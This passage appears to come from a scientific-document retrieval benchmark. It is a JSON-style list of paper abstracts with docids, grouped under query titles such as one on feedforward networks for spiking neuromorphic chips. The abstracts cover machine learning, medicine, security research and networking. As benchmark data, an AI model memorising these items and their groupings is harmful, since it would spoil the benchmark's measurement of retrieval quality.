"text": "The interest for data mining techniques has increased tremendously during the past decades, and numerous classification techniques have been applied in a wide range of business applications. Hence, the need for adequate performance measures has become more important than ever. In this paper, a cost-benefit analysis framework is formalized in order to define performance measures which are aligned with the main objectives of the end users, i.e., profit maximization. A new performance measure is defined, the expected maximum profit criterion. This general framework is then applied to the customer churn problem with its particular cost-benefit structure. The advantage of this approach is that it assists companies with selecting the classifier which maximizes the profit. Moreover, it aids with the practical implementation in the sense that it provides guidance about the fraction of the customer base to be included in the retention campaign.",
"title": ""
},
{
"docid": "e96f7ed55a54b19fe983130b3dd16f7d",
"text": "In this paper, we present an alternative approach to neuromorphic systems based on multilevel resistive memory synapses and deterministic learning rules. We demonstrate an original methodology to use conductive-bridge RAM (CBRAM) devices as, easy to program and low-power, binary synapses with stochastic learning rules. New circuit architecture, programming strategy, and probabilistic spike-timing dependent plasticity (STDP) learning rule for two different CBRAM configurations with-selector (1T-1R) and without-selector (1R) are proposed. We show two methods (intrinsic and extrinsic) for implementing probabilistic STDP rules. Fully unsupervised learning with binary synapses is illustrated through two example applications: 1) real-time auditory pattern extraction (inspired from a 64-channel silicon cochlea emulator); and 2) visual pattern extraction (inspired from the processing inside visual cortex). High accuracy (audio pattern sensitivity > 2, video detection rate > 95%) and low synaptic-power dissipation (audio 0.55 μW, video 74.2 μW) are shown. The robustness and impact of synaptic parameter variability on system performance are also analyzed.",
"title": ""
},
{
"docid": "906659aa61bbdb5e904a1749552c4741",
"text": "The Rete–Match algorithm is a matching algorithm used to develop production systems. Although this algorithm is the fastest known algorithm, for many patterns and many objects matching, it still suffers from considerable amount of time needed due to the recursive nature of the problem. In this paper, a parallel version of the Rete–Match algorithm for distributed memory architecture is presented. Also, a theoretical analysis to its correctness and performance is discussed. q 1998 Elsevier Science B.V. All rights reserved.",
"title": ""
},
{
"docid": "125148cad2e3aef1cf7cb1fb9698f305",
"text": "BACKGROUND\nDental decay is the most common childhood disease worldwide and most of the decay remains untreated. In the Philippines caries levels are among the highest in the South East Asian region. Elementary school children suffer from high prevalence of stunting and underweight.The present study aimed to investigate the association between untreated dental decay and Body Mass Index (BMI) among 12-year-old Filipino children.\n\n\nMETHODS\nData collection was part of the National Oral Health Survey, a representative cross-sectional study of 1951 11-13-year-old school children using a modified, stratified cluster sampling design based on population classifications of the Philippine National Statistics Office. Caries was scored according to WHO criteria (1997) and odontogenic infections using the PUFA index. Anthropometric measures were performed by trained nurses. Some socio-economic determinants were included as potential confounding factors.\n\n\nRESULTS\nThe overall prevalence of caries (DMFT + dmft > 0) was 82.3% (95%CI; 80.6%-84.0%). The overall prevalence of odontogenic infections due to caries (PUFA + pufa > 0) was 55.7% (95% CI; 53.5%-57.9%) The BMI of 27.1% (95%CI; 25.1%-29.1%) of children was below normal, 1% (95%CI; 0.5%-1.4%) had a BMI above normal. The regression coefficient between BMI and caries was highly significant (p < 0.001). Children with odontogenic infections (PUFA + pufa > 0) as compared to those without odontogenic infections had an increased risk of a below normal BMI (OR: 1.47; 95% CI: 1.19-1.80).\n\n\nCONCLUSIONS\nThis is the first-ever representative survey showing a significant association between caries and BMI and particularly between odontogenic infections and below normal BMI. An expanded model of hypothesised associations is presented that includes progressed forms of dental decay as a significant, yet largely neglected determinant of poor child development.",
"title": ""
},
{
"docid": "b7418463f6f0193925299346a5aad680",
"text": "This paper proposes an efficient bitwise solution to the single-channel source separation task. Most dictionary-based source separation algorithms rely on iterative update rules during the run time, which becomes computationally costly especially when we employ an overcomplete dictionary and sparse encoding that tend to give better separation results. To avoid such cost we propose a bitwise scheme on hashed spectra that leads to an efficient posterior probability calculation. For each source, the algorithm uses a partial rank order metric to extract robust features that form a binarized dictionary of hashed spectra. Then, for a mixture spectrum, its hash code is compared with each source's hashed dictionary in one pass. This simple voting-based dictionary search allows a fast and iteration-free estimation of ratio masking at each bin of a signal spectrogram. We verify that the proposed BitWise Source Separation (BWSS) algorithm produces sensible source separation results for the single-channel speech denoising task, with 6–8 dB mean SDR. To our knowledge, this is the first dictionary based algorithm for this task that is completely iteration-free in both training and testing.",
"title": ""
},
{
"docid": "5150c416ac9d5b76e4f712abf65d95f9",
"text": "Despite the advances made in artificial intelligence, software agents, and robotics, there is little we see today that we can truly call a fully autonomous system. We conjecture that the main inhibitor for advancing autonomy is lack of trust. Trusted autonomy is the scientific and engineering field to establish the foundations and ground work for developing trusted autonomous systems (robotics and software agents) that can be used in our daily life, and can be integrated with humans seamlessly, naturally, and efficiently. In this paper, we review this literature to reveal opportunities for researchers and practitioners to work on topics that can create a leap forward in advancing the field of trusted autonomy. We focus this paper on the trust component as the uniting technology between humans and machines. Our inquiry into this topic revolves around three subtopics: (1) reviewing and positioning the trust modeling literature for the purpose of trusted autonomy; (2) reviewing a critical subset of sensor technologies that allow a machine to sense human states; and (3) distilling some critical questions for advancing the field of trusted autonomy. The inquiry is augmented with conceptual models that we propose along the way by recompiling and reshaping the literature into forms that enable trusted autonomous systems to become a reality. This paper offers a vision for a Trusted Cyborg Swarm, an extension of our previous Cognitive Cyber Symbiosis concept, whereby humans and machines meld together in a harmonious, seamless, and coordinated manner.",
"title": ""
},
{
"docid": "a4418b6e010a630a8ae1f10ce23e0ec5",
"text": "While neural machine translation (NMT) has made remarkable progress in recent years, it is hard to interpret its internal workings due to the continuous representations and non-linearity of neural networks. In this work, we propose to use layer-wise relevance propagation (LRP) to compute the contribution of each contextual word to arbitrary hidden states in the attention-based encoderdecoder framework. We show that visualization with LRP helps to interpret the internal workings of NMT and analyze translation errors.",
"title": ""
},
{
"docid": "296705d6bfc09f58c8e732a469b17871",
"text": "Computer security incident response teams (CSIRTs) respond to a computer security incident when the need arises. Failure of these teams can have far-reaching effects for the economy and national security. CSIRTs often have to work on an ad hoc basis, in close cooperation with other teams, and in time constrained environments. It could be argued that under these working conditions CSIRTs would be likely to encounter problems. A needs assessment was done to see to which extent this argument holds true. We constructed an incident response needs model to assist in identifying areas that require improvement. We envisioned a model consisting of four assessment categories: Organization, Team, Individual and Instrumental. Central to this is the idea that both problems and needs can have an organizational, team, individual, or technical origin or a combination of these levels. To gather data we conducted a literature review. This resulted in a comprehensive list of challenges and needs that could hinder or improve, respectively, the performance of CSIRTs. Then, semi-structured in depth interviews were held with team coordinators and team members of five public and private sector Dutch CSIRTs to ground these findings in practice and to identify gaps between current and desired incident handling practices. This paper presents the findings of our needs assessment and ends with a discussion of potential solutions to problems with performance in incident response.",
"title": ""
},
{
"docid": "df20ee9b4d65e104fc090a7c2720a357",
"text": "Contemporary digital game developers offer a variety of games for the diverse tastes of their customers. Although the gaming experience often depends on one's preferences, the same may not apply to the level of their immersion. It has been argued whether the player perspective can influence the level of player's involvement with the game. The aim of this study was to research whether interacting with a game in first person perspective is more immersive than playing in the third person point of view (POV). The set up to test the theory involved participants playing a role-playing game in either mode, naming their preferred perspective, and subjectively evaluating their immersive experience. The results showed that people were more immersed in the game play when viewing the game world through the eyes of the character, regardless of their preferred perspectives.",
"title": ""
}
] | scidocsrr |
4281d725edae0d9db16c5a4abf3ea727 | Improving classification accuracy of feedforward neural networks for spiking neuromorphic chips | [
{
"docid": "8d3e93e59a802535e9d5ef7ca7ace362",
"text": "Marching along the DARPA SyNAPSE roadmap, IBM unveils a trilogy of innovations towards the TrueNorth cognitive computing system inspired by the brain's function and efficiency. Judiciously balancing the dual objectives of functional capability and implementation/operational cost, we develop a simple, digital, reconfigurable, versatile spiking neuron model that supports one-to-one equivalence between hardware and simulation and is implementable using only 1272 ASIC gates. Starting with the classic leaky integrate-and-fire neuron, we add: (a) configurable and reproducible stochasticity to the input, the state, and the output; (b) four leak modes that bias the internal state dynamics; (c) deterministic and stochastic thresholds; and (d) six reset modes for rich finite-state behavior. The model supports a wide variety of computational functions and neural codes. We capture 50+ neuron behaviors in a library for hierarchical composition of complex computations and behaviors. Although designed with cognitive algorithms and applications in mind, serendipitously, the neuron model can qualitatively replicate the 20 biologically-relevant behaviors of a dynamical neuron model.",
"title": ""
},
{
"docid": "5aa10413b995b6b86100585f3245e4d9",
"text": "In this paper, we describe the design of Neurogrid, a neuromorphic system for simulating large-scale neural models in real time. Neuromorphic systems realize the function of biological neural systems by emulating their structure. Designers of such systems face three major design choices: 1) whether to emulate the four neural elements-axonal arbor, synapse, dendritic tree, and soma-with dedicated or shared electronic circuits; 2) whether to implement these electronic circuits in an analog or digital manner; and 3) whether to interconnect arrays of these silicon neurons with a mesh or a tree network. The choices we made were: 1) we emulated all neural elements except the soma with shared electronic circuits; this choice maximized the number of synaptic connections; 2) we realized all electronic circuits except those for axonal arbors in an analog manner; this choice maximized energy efficiency; and 3) we interconnected neural arrays in a tree network; this choice maximized throughput. These three choices made it possible to simulate a million neurons with billions of synaptic connections in real time-for the first time-using 16 Neurocores integrated on a board that consumes three watts.",
"title": ""
}
] | [
{
"docid": "a98f643c2a0e40a767f5ef57b0152adb",
"text": "Techniques for recognizing high-level events in consumer videos on the Internet have many applications. Systems that produced state-of-the-art recognition performance usually contain modules requiring extensive computation, such as the extraction of the temporal motion trajectories, which cannot be deployed on large-scale datasets. In this paper, we provide a comprehensive study on efficient methods in this area and identify technical options for super fast event recognition in Internet videos. We start from analyzing a multimodal baseline that has produced good performance on popular benchmarks, by systematically evaluating each component in terms of both computational cost and contribution to recognition accuracy. After that, we identify alternative features, classifiers, and fusion strategies that can all be efficiently computed. In addition, we also provide a study on the following interesting question: for event recognition in Internet videos, what is the minimum number of visual and audio frames needed to obtain a comparable accuracy to that of using all the frames? Results on two rigorously designed datasets indicate that similar results can be maintained by using only a small portion of the visual frames. We also find that, different from the visual frames, the soundtracks contain little redundant information and thus sampling is always harmful. Integrating all the findings, our suggested recognition system is 2,350-fold faster than a baseline approach with even higher recognition accuracies. It recognizes 20 classes on a 120-second video sequence in just 1.78 seconds, using a regular desktop computer.",
"title": ""
},
{
"docid": "e28b8c08275947f0908f64d117f5dc8e",
"text": "We propose a method for using synthetic data to help learning classifiers. Synthetic data, even is generated based on real data, normally results in a shift from the distribution of real data in feature space. To bridge the gap between the real and synthetic data, and jointly learn from synthetic and real data, this paper proposes a Multichannel Autoencoder(MCAE). We show that by suing MCAE, it is possible to learn a better feature representation for classification. To evaluate the proposed approach, we conduct experiments on two types of datasets. Experimental results on two datasets validate the efficiency of our MCAE model and our methodology of generating synthetic data.",
"title": ""
},
{
"docid": "59daeea2c602a1b1d64bae95185f9505",
"text": "Traumatic brain injury (TBI) triggers endoplasmic reticulum (ER) stress and impairs autophagic clearance of damaged organelles and toxic macromolecules. In this study, we investigated the effects of the post-TBI administration of docosahexaenoic acid (DHA) on improving hippocampal autophagy flux and cognitive functions of rats. TBI was induced by cortical contusion injury in Sprague–Dawley rats, which received DHA (16 mg/kg in DMSO, intraperitoneal administration) or vehicle DMSO (1 ml/kg) with an initial dose within 15 min after the injury, followed by a daily dose for 3 or 7 days. First, RT-qPCR reveals that TBI induced a significant elevation in expression of autophagy-related genes in the hippocampus, including SQSTM1/p62 (sequestosome 1), lysosomal-associated membrane proteins 1 and 2 (Lamp1 and Lamp2), and cathepsin D (Ctsd). Upregulation of the corresponding autophagy-related proteins was detected by immunoblotting and immunostaining. In contrast, the DHA-treated rats did not exhibit the TBI-induced autophagy biogenesis and showed restored CTSD protein expression and activity. T2-weighted images and diffusion tensor imaging (DTI) of ex vivo brains showed that DHA reduced both gray matter and white matter damages in cortical and hippocampal tissues. DHA-treated animals performed better than the vehicle control group on the Morris water maze test. Taken together, these findings suggest that TBI triggers sustained stimulation of autophagy biogenesis, autophagy flux, and lysosomal functions in the hippocampus. Swift post-injury DHA administration restores hippocampal lysosomal biogenesis and function, demonstrating its therapeutic potential.",
"title": ""
},
{
"docid": "df331d60ab6560808e28e3813766b67b",
"text": "Analyzing large graphs provides valuable insights for social networking and web companies in content ranking and recommendations. While numerous graph processing systems have been developed and evaluated on available benchmark graphs of up to 6.6B edges, they often face significant difficulties in scaling to much larger graphs. Industry graphs can be two orders of magnitude larger hundreds of billions or up to one trillion edges. In addition to scalability challenges, real world applications often require much more complex graph processing workflows than previously evaluated. In this paper, we describe the usability, performance, and scalability improvements we made to Apache Giraph, an open-source graph processing system, in order to use it on Facebook-scale graphs of up to one trillion edges. We also describe several key extensions to the original Pregel model that make it possible to develop a broader range of production graph applications and workflows as well as improve code reuse. Finally, we report on real-world operations as well as performance characteristics of several large-scale production applications.",
"title": ""
},
{
"docid": "cddca3a23ea0568988243c8f005e0edc",
"text": "This paper investigates the mechanisms through which organizations develop dynamic capabilities, defined as routinized activities directed to the development and adaptation of operating routines, and reflects upon the role of (1) experience accumulation, (2) knowledge articulation and (3) knowledge codification processes in the evolution of dynamic, as well as operational, routines. The argument is made that dynamic capabilities are shaped by the co-evolution of these learning mechanisms. At any point in time, firms adopt a mix of learning behaviors constituted by a semi-automatic accumulation of experience and by deliberate investments in knowledge articulation and codification activities. The relative effectiveness of these capability-building mechanisms is analyzed here as contingent upon selected features of the task to be learned, such as its frequency, homogeneity and degree of causal ambiguity, and testable hypotheses are derived. Somewhat counterintuitive implications of the analysis include the relatively superior effectiveness of highly deliberate learning processes, such as knowledge codification, at lower levels of frequency and homogeneity of the organizational task, in contrast with common managerial practice.",
"title": ""
},
{
"docid": "4daeec6970f241293a51e93e147a60c3",
"text": "There is a considerable evidence that our perception of sound uses important features which are related to underlying signal modulations. This topic has been studied extensively via perceptual experiments, yet there are few, if any, well-developed signal processing methods which capitalize on or model these effects. We begin by summarizing evidence of the importance of modulation representations from psychophysical, physiological, and other sources. The concept of a two-dimensional joint acoustic and modulation frequency representation is proposed. A simple single sinusoidal amplitude modulator of a sinusoidal carrier is then used to illustrate properties of an unconstrained and ideal joint representation. Added constraints are required to remove or reduce undesired interference terms and to provide invertibility. It is then noted that the constraints would be also applied to more general and complex cases of broader modulation and carriers. Applications in single-channel speaker separation and in audio coding are used to illustrate the applicability of this joint representation. Other applications in signal analysis and filtering are suggested.",
"title": ""
},
{
"docid": "be68f44aca9f8c88c2757a6910d7e5a5",
"text": "Creative computational systems have often been largescale endeavors, based on elaborate models of creativity and sometimes featuring an accumulation of heuristics and numerous subsystems. An argument is presented for facilitating the exploration of creativity through small-scale systems, which can be more transparent, reusable, focused, and easily generalized across domains and languages. These systems retain the ability, however, to model important aspects of aesthetic and creative processes. Examples of extremely simple story generators are presented along with their implications for larger-scale systems. A case study focuses on a system that implements the simplest possible model of ellipsis.",
"title": ""
},
{
"docid": "491ddda3cf5acf013b99cdb477acfc9e",
"text": "As we outsource more of our decisions and activities to machines with various degrees of autonomy, the question of clarifying the moral and legal status of their autonomous behaviour arises. There is also an ongoing discussion on whether artificial agents can ever be liable for their actions or become moral agents. Both in law and ethics, the concept of liability is tightly connected with the concept of ability. But as we work to develop moral machines, we also push the boundaries of existing categories of ethical competency and autonomy. This makes the question of responsibility particularly difficult. Although new classification schemes for ethical behaviour and autonomy have been discussed, these need to be worked out in far more detail. Here we address some issues with existing proposals, highlighting especially the link between ethical competency and autonomy, and the problem of anchoring classifications in an operational understanding of what we mean by a moral",
"title": ""
},
{
"docid": "94105f6e64a27b18f911d788145385b6",
"text": "Low socioeconomic status (SES) is generally associated with high psychiatric morbidity, more disability, and poorer access to health care. Among psychiatric disorders, depression exhibits a more controversial association with SES. The authors carried out a meta-analysis to evaluate the magnitude, shape, and modifiers of such an association. The search found 51 prevalence studies, five incidence studies, and four persistence studies meeting the criteria. A random effects model was applied to the odds ratio of the lowest SES group compared with the highest, and meta-regression was used to assess the dose-response relation and the influence of covariates. Results indicated that low-SES individuals had higher odds of being depressed (odds ratio = 1.81, p < 0.001), but the odds of a new episode (odds ratio = 1.24, p = 0.004) were lower than the odds of persisting depression (odds ratio = 2.06, p < 0.001). A dose-response relation was observed for education and income. Socioeconomic inequality in depression is heterogeneous and varies according to the way psychiatric disorder is measured, to the definition and measurement of SES, and to contextual features such as region and time. Nonetheless, the authors found compelling evidence for socioeconomic inequality in depression. Strategies for tackling inequality in depression are needed, especially in relation to the course of the disorder.",
"title": ""
},
{
"docid": "f393b6e00ef1e97f683a5dace33e40ff",
"text": "s on human factors in computing systems (pp. 815–828). ACM New York, NY, USA. Hudlicka, E. (1997). Summary of knowledge elicitation techniques for requirements analysis (Course material for human computer interaction). Worcester Polytechnic Institute. Kaptelinin, V., & Nardi, B. (2012). Affordances in HCI: Toward a mediated action perspective. In Proceedings of CHI '12 (pp. 967–976).",
"title": ""
},
{
"docid": "fc3b087bd2c0bd4e12f3cb86f6346c96",
"text": "This study investigated whether changes in the technological/social environment in the United States over time have resulted in concomitant changes in the multitasking skills of younger generations. One thousand, three hundred and nineteen Americans from three generations were queried to determine their at-home multitasking behaviors. An anonymous online questionnaire asked respondents to indicate which everyday and technology-based tasks they choose to combine for multitasking and to indicate how difficult it is to multitask when combining the tasks. Combining tasks occurred frequently, especially while listening to music or eating. Members of the ‘‘Net Generation” reported more multitasking than members of ‘‘Generation X,” who reported more multitasking than members of the ‘‘Baby Boomer” generation. The choices of which tasks to combine for multitasking were highly correlated across generations, as were difficulty ratings of specific multitasking combinations. The results are consistent with a greater amount of general multitasking resources in younger generations, but similar mental limitations in the types of tasks that can be multitasked. 2008 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "e3853e259c3ae6739dcae3143e2074a8",
"text": "A new reference collection of patent documents for training and testing automated categorization systems is established and described in detail. This collection is tailored for automating the attribution of international patent classification codes to patent applications and is made publicly available for future research work. We report the results of applying a variety of machine learning algorithms to the automated categorization of English-language patent documents. This procedure involves a complex hierarchical taxonomy, within which we classify documents into 114 classes and 451 subclasses. Several measures of categorization success are described and evaluated. We investigate how best to resolve the training problems related to the attribution of multiple classification codes to each patent document.",
"title": ""
},
{
"docid": "5dee244ee673909c3ba3d3d174a7bf83",
"text": "Fingerprint has remained a very vital index for human recognition. In the field of security, series of Automatic Fingerprint Identification Systems (AFIS) have been developed. One of the indices for evaluating the contributions of these systems to the enforcement of security is the degree with which they appropriately verify or identify input fingerprints. This degree is generally determined by the quality of the fingerprint images and the efficiency of the algorithm. In this paper, some of the sub-models of an existing mathematical algorithm for the fingerprint image enhancement were modified to obtain new and improved versions. The new versions consist of different mathematical models for fingerprint image segmentation, normalization, ridge orientation estimation, ridge frequency estimation, Gabor filtering, binarization and thinning. The implementation was carried out in an environment characterized by Window Vista Home Basic operating system as platform and Matrix Laboratory (MatLab) as frontend engine. Synthetic images as well as real fingerprints obtained from the FVC2004 fingerprint database DB3 set A were used to test the adequacy of the modified sub-models and the resulting algorithm. The results show that the modified sub-models perform well with significant improvement over the original versions. The results also show the necessity of each level of the enhancement. KeywordAFIS; Pattern recognition; pattern matching; fingerprint; minutiae; image enhancement.",
"title": ""
},
{
"docid": "e2b166491ccc69674d2a597282facf02",
"text": "With the advancement of radio access networks, more and more mobile data content needs to be transported by optical networks. Mobile fronthaul is an important network segment that connects centralized baseband units (BBUs) with remote radio units in cloud radio access networks (C-RANs). It enables advanced wireless technologies such as coordinated multipoint and massive multiple-input multiple-output. Mobile backhaul, on the other hand, connects BBUs with core networks to transport the baseband data streams to their respective destinations. Optical access networks are well positioned to meet the first optical communication demands of C-RANs. To better address the stringent requirements of future generations of wireless networks, such as the fifth-generation (5G) wireless, optical access networks need to be improved and enhanced. In this paper, we review emerging optical access network technologies that aim to support 5G wireless with high capacity, low latency, and low cost and power per bit. Advances in high-capacity passive optical networks (PONs), such as 100 Gbit/s PON, will be reviewed. Among the topics discussed are advanced modulation and detection techniques, digital signal processing tailored for optical access networks, and efficient mobile fronthaul techniques. We also discuss the need for coordination between RAN and PON to simplify the overall network, reduce the network latency, and improve the network cost efficiency and power efficiency.",
"title": ""
},
{
"docid": "63f0ff6663f334e1ab05d0ce5d2239cf",
"text": "Railroad tracks need to be periodically inspected and monitored to ensure safe transportation. Automated track inspection using computer vision and pattern recognition methods has recently shown the potential to improve safety by allowing for more frequent inspections while reducing human errors. Achieving full automation is still very challenging due to the number of different possible failure modes, as well as the broad range of image variations that can potentially trigger false alarms. In addition, the number of defective components is very small, so not many training examples are available for the machine to learn a robust anomaly detector. In this paper, we show that detection performance can be improved by combining multiple detectors within a multitask learning framework. We show that this approach results in improved accuracy for detecting defects on railway ties and fasteners.",
"title": ""
},
{
"docid": "8ed61e6caf9864805fb6017aa5c35600",
"text": "Self-modifying code (SMC) is widely used in obfuscated program for enhancing the difficulty in reverse engineering. The typical mode of self-modifying code is restore-execute-hide, it drives program to conceal real behaviors at most of the time, and only under actual running will the real code be restored and executed. In order to locate the SMC and further recover the original logic of code for guiding program analysis, dynamic self-modifying code detecting method based on backward analysis is proposed. Our method first extracts execution trace such as instructions and status through dynamic analysis. Then we maintain a memory set to store the memory address of execution instructions, the memory set will update dynamically while backward searching the trace, and simultaneously will we check the memory write address to match with current memory set in order to identify the mode \"modify then execute\". By means of validating self-modifying code which is identified via above procedures, we can easily deobfuscate the program which use self-modifying code and achieve its original logic. A prototype that can be applied in self-modifying code detection is designed and implemented. The evaluation results show our method can trace the execution of program effectively, and can reduce the consumption in time and space.",
"title": ""
},
{
"docid": "a9907a05542c0a419ad4dcd3fdb7132b",
"text": "In this paper we develop an adaptive dual free Stochastic Dual Coordinate Ascent (adfSDCA) algorithm for regularized empirical risk minimization problems. This is motivated by the recent work on dual free SDCA of Shalev-Shwartz (2016). The novelty of our approach is that the coordinates to update at each iteration are selected non-uniformly from an adaptive probability distribution, and this extends the previously mentioned work which only allowed for a uniform selection of “dual” coordinates from a fixed probability distribution. We describe an efficient iterative procedure for generating the non-uniform samples, where the scheme selects the coordinate with the greatest potential to decrease the sub-optimality of the current iterate. We also propose a heuristic variant of adfSDCA that is more aggressive than the standard approach. Furthermore, in order to utilize multi-core machines we consider a mini-batch adfSDCA algorithm and develop complexity results that guarantee the algorithm’s convergence. The work is concluded with several numerical experiments to demonstrate the practical benefits of the proposed approach.",
"title": ""
},
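A minimal sketch of the adaptive, non-uniform coordinate sampling idea described in the adfSDCA abstract above; the residual-proportional probabilities used here are an assumption for illustration, not the paper's exact sampling rule.

```python
import numpy as np

def adaptive_pick(dual_residuals, rng):
    """Pick a coordinate with probability proportional to its current
    potential to reduce sub-optimality (here: |dual residual|)."""
    p = np.abs(dual_residuals).astype(float)
    if p.sum() == 0:
        p = np.ones_like(p)             # fall back to uniform sampling
    p /= p.sum()
    return rng.choice(len(p), p=p)

rng = np.random.default_rng(0)
residuals = np.array([0.1, 2.0, 0.5, 0.0])
picked = adaptive_pick(residuals, rng)  # coordinate 1 is sampled most often
```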
{
"docid": "36f2470ce215647bf92cbb9d8316c51c",
"text": "BACKGROUND\nIn schizophrenia and major depressive disorder, anhedonia (a loss of capacity to feel pleasure) had differently been considered as a premorbid personological trait or as a main symptom of their clinical picture. The aims of this study were to examine the pathological features of anhedonia in schizophrenic and depressed patients, and to investigate its clinical relations with general psychopathology (negative, positive, and depressive dimensions).\n\n\nMETHODS\nA total of 145 patients (80 schizophrenics and 65 depressed subjects) were assessed using the Physical Anhedonia Scale and the Social Anhedonia Scale (PAS and SAS, respectively), the Scales for the Assessment of Positive and Negative Symptoms (SAPS and SANS, respectively), the Calgary Depression Scale for Schizophrenics (CDSS), and the Hamilton Depression Rating Scale (HDRS). The statistical analysis was performed in two steps. First, the schizophrenic and depressed samples were dichotomised into 'anhedonic' and 'normal hedonic' subgroups (according to the 'double (PAS/SAS) cut-off') and were compared on the general psychopathology scores using the Mann-Whitney Z test. Subsequently, for the total schizophrenic and depressed samples, Spearman correlations were calculated to examine the relation between anhedonia ratings and the other psychopathological parameters.\n\n\nRESULTS\nIn the schizophrenic sample, anhedonia reached high significant levels only in 45% of patients (n = 36). This 'anhedonic' subgroup was distinguished by high scores in the disorganisation and negative dimensions. Positive correlations of anhedonia with disorganised and negative symptoms were also been detected. In the depressed sample, anhedonia reached high significant levels in only 36.9% of subjects (n = 24). This 'anhedonic' subgroup as distinguished by high scores in the depression severity and negative dimensions. Positive correlations of anhedonia with depressive and negative symptoms were also been detected.\n\n\nCONCLUSION\nIn the schizophrenic sample, anhedonia seems to be a specific subjective psychopathological experience of the negative and disorganised forms of schizophrenia. In the depressed sample, anhedonia seems to be a specific subjective psychopathological experience of those major depressive disorder forms with a marked clinical depression severity.",
"title": ""
},
{
"docid": "6f89545413126005fe475b56798a3b86",
"text": "Sustainable electrification planning for remote locations especially in developing countries is very complex in nature while considering different traits such as social, economic, technical, and environmental. To address these issues related to current energy needs depending upon the end user requirements, a coherent, translucent, efficient, and rational energy planning framework has to be identified. This paper presents a comprehensive generalized methodological framework based on the synergies of decision analysis and optimization models for the design of a reliable, robust, and economic microgrid system based on locally available resources for rural communities in developing nations. The framework consists of three different stages. First, decision analysis considering various criterions (technical, social, economic, and environmental) for the selection of suitable energy alternative for designing the microgrid considering multiple scenarios are carried out. Second, the optimal sizing of the various energy resources in different microgrid structures is illustrated. Third, hybrid decision analysis methods are used for selection of the best sustainable microgrid energy system. Finally, the framework presented is then utilized for the design of a sustainable rural microgrid for a remote community located in the Himalayas in India to illustrate its effectiveness. The results obtained show that decision analysis tools provide a real-time solution for rural electrification by binding the synergy between various criteria considering different scenarios. The feasibility analysis using proposed multiyear scalable approach shows its competence not only in determining the suitable size of the microgrid, but also by reducing the net present cost and the cost of electricity significantly.",
"title": ""
},
{
"docid": "8693b7f3e4f4071ab9490f824630285c",
"text": "The difficulty of emotion recognition in the wild (EmotiW) is how to train a robust model to deal with diverse scenarios and anomalies. The Audio-video Sub-challenge in EmotiW contains audio-video short clips with several emotional labels and the task is to distinguish which label the video belongs to. For the better emotion recognition in videos, we propose a multiple spatio-temporal feature fusion (MSFF) framework, which can more accurately depict emotional information in spatial and temporal dimensions by two mutually complementary sources, including the facial image and audio. The framework is consisted of two parts: the facial image model and the audio model. With respect to the facial image model, three different architectures of spatial-temporal neural networks are employed to extract discriminative features about different emotions in facial expression images. Firstly, the high-level spatial features are obtained by the pre-trained convolutional neural networks (CNN), including VGG-Face and ResNet-50 which are all fed with the images generated by each video. Then, the features of all frames are sequentially input to the Bi-directional Long Short-Term Memory (BLSTM) so as to capture dynamic variations of facial appearance textures in a video. In addition to the structure of CNN-RNN, another spatio-temporal network, namely deep 3-Dimensional Convolutional Neural Networks (3D CNN) by extending the 2D convolution kernel to 3D, is also applied to attain evolving emotional information encoded in multiple adjacent frames. For the audio model, the spectrogram images of speech generated by preprocessing audio, are also modeled in a VGG-BLSTM framework to characterize the affective fluctuation more efficiently. Finally, a fusion strategy with the score matrices of different spatio-temporal networks gained from the above framework is proposed to boost the performance of emotion recognition complementally. Extensive experiments show that the overall accuracy of our proposed MSFF is 60.64%, which achieves a large improvement compared with the baseline and outperform the result of champion team in 2017.",
"title": ""
}
] | scidocsrr |
8241a37781dba5ef020939ffeabcf0a2 | Regional Grey Matter Structure Differences between Transsexuals and Healthy Controls—A Voxel Based Morphometry Study | [
{
"docid": "6d45e9d4d1f46debcbf1b95429be60fd",
"text": "Sex differences in cortical thickness (CTh) have been extensively investigated but as yet there are no reports on CTh in transsexuals. Our aim was to determine whether the CTh pattern in transsexuals before hormonal treatment follows their biological sex or their gender identity. We performed brain magnetic resonance imaging on 94 subjects: 24 untreated female-to-male transsexuals (FtMs), 18 untreated male-to-female transsexuals (MtFs), and 29 male and 23 female controls in a 3-T TIM-TRIO Siemens scanner. T1-weighted images were analyzed to obtain CTh and volumetric subcortical measurements with FreeSurfer software. CTh maps showed control females have thicker cortex than control males in the frontal and parietal regions. In contrast, males have greater right putamen volume. FtMs had a similar CTh to control females and greater CTh than males in the parietal and temporal cortices. FtMs had larger right putamen than females but did not differ from males. MtFs did not differ in CTh from female controls but had greater CTh than control males in the orbitofrontal, insular, and medial occipital regions. In conclusion, FtMs showed evidence of subcortical gray matter masculinization, while MtFs showed evidence of CTh feminization. In both types of transsexuals, the differences with respect to their biological sex are located in the right hemisphere.",
"title": ""
}
] | [
{
"docid": "2ff290ba8bab0de760c289bff3feee06",
"text": "Bayesian Networks are being used extensively for reasoning under uncertainty. Inference mechanisms for Bayesian Networks are compromised by the fact that they can only deal with propositional domains. In this work, we introduce an extension of that formalism, Hierarchical Bayesian Networks, that can represent additional information about the structure of the domains of variables. Hierarchical Bayesian Networks are similar to Bayesian Networks, in that they represent probabilistic dependencies between variables as a directed acyclic graph, where each node of the graph corresponds to a random variable and is quanti ed by the conditional probability of that variable given the values of its parents in the graph. What extends the expressive power of Hierarchical Bayesian Networks is that a node may correspond to an aggregation of simpler types. A component of one node may itself represent a composite structure; this allows the representation of complex hierarchical domains. Furthermore, probabilistic dependencies can be expressed at any level, between nodes that are contained in the same structure.",
"title": ""
},
{
"docid": "b2ebad4a19cdfce87e6b69a25ba6ab49",
"text": "Collaborative filtering have become increasingly important with the development of Web 2.0. Online shopping service providers aim to provide users with quality list of recommended items that will enhance user satisfaction and loyalty. Matrix factorization approaches have become the dominant method as they can reduce the dimension of the data set and alleviate the sparsity problem. However, matrix factorization approaches are limited because they depict each user as one preference vector. In practice, we observe that users may have different preferences when purchasing different subsets of items, and the periods between purchases also vary from one user to another. In this work, we propose a probabilistic approach to learn latent clusters in the large user-item matrix, and incorporate temporal information into the recommendation process. Experimental results on a real world dataset demonstrate that our approach significantly improves the conversion rate, precision and recall of state-of-the-art methods.",
"title": ""
},
{
"docid": "3e442c589eb4b2501b6ed2a8f1774e73",
